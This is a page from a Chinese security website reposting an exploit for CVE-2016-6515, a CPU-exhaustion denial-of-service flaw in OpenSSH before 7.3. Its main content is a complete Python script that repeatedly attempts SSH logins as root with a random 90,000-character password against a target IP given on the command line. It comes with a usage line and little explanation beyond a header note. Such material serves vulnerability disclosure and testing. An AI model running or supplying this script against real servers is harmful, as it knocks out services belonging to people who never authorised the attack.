首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 OpenSSH 7.2 - Denial of Service 来源：www.secpod.com 作者：Kashinath 发布时间：2016-12-08   ################################################################################ # Title     : OpenSSH before 7.3 Crypt CPU Consumption (DoS Vulnerability) # Author    : Kashinath T (tkashinath@secpod.com) (www.secpod.com) # Vendor    : http://www.openssh.com/ # Software  : http://www.openssh.com/ # Version   : OpenSSH before 7.3 # Tested on : Ubuntu 16.04 LTS, Centos 7 # CVE       : CVE-2016-6515 # Date      : 20-10-2016 # # NOTE: # If the remote machine is installed and running OpenSSH version prior to 7.3, # it does not limit the password length for authentication. Hence, to exploit # this vulnerability' we will send a crafted data which is of 90000 characters # in length to the 'password' field while attempting to log in to a remote # machine via ssh with username as 'root'. # # For more info refer, # http://www.secpod.com/blog/openssh-crypt-cpu-consumption ################################################################################   import sys from random import choice from string import lowercase   try:     import paramiko except ImportError:     print "[-] python module 'paramiko' is missing, Install paramiko with" \           " following command 'sudo pip install paramiko'"     sys.exit(0)     class ssh_exploit:       def __init__(self):         """         Initialise the objects         """       def ssh_login(self, remote_ip):           try:             # Crafted password of length 90000             passwd_len = 90000             crafted_passwd = "".join(choice(lowercase)                                      for i in range(passwd_len))               # Connect to a remote machine via ssh             ssh = paramiko.SSHClient()             ssh.load_system_host_keys()             ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())               # calling connect in infinite loop             print "[+] Entering infinite loop"             while 1:                 ssh.connect(remote_ip, username='root',                             password=crafted_passwd)           except Exception, msg:             print "Error in connecting to remote host : ", remote_ip             print "Exception in : ssh_login method."             sys.exit(msg)     def main():       if len(sys.argv) != 2:         print "usage: python openssh_crypt_cpu_consumption_dos.py 192.168.x.x"         sys.exit()       # Calling ssh_connect     ref_obj = ssh_exploit()     ref_obj.ssh_login(sys.argv[1])     if __name__ == "__main__":     main()   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·TP-LINK TD-W8951ND - Denial of ·Microsoft Internet Explorer 9 ·Dual DHCP DNS Server 7.29 - De ·Microsoft Internet Explorer 9 ·Windows 10 x86/x64 WLAN AutoCo ·Microsoft Internet Explorer 9 ·Microsoft Internet Explorer js ·OpenSSL 1.1.0a/1.1.0b - Denial ·Microsoft Edge - CBaseScriptab ·10-Strike Network File Search ·Microsoft Internet Explorer 9 ·Serva 3.0.0 HTTP Server - Deni   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved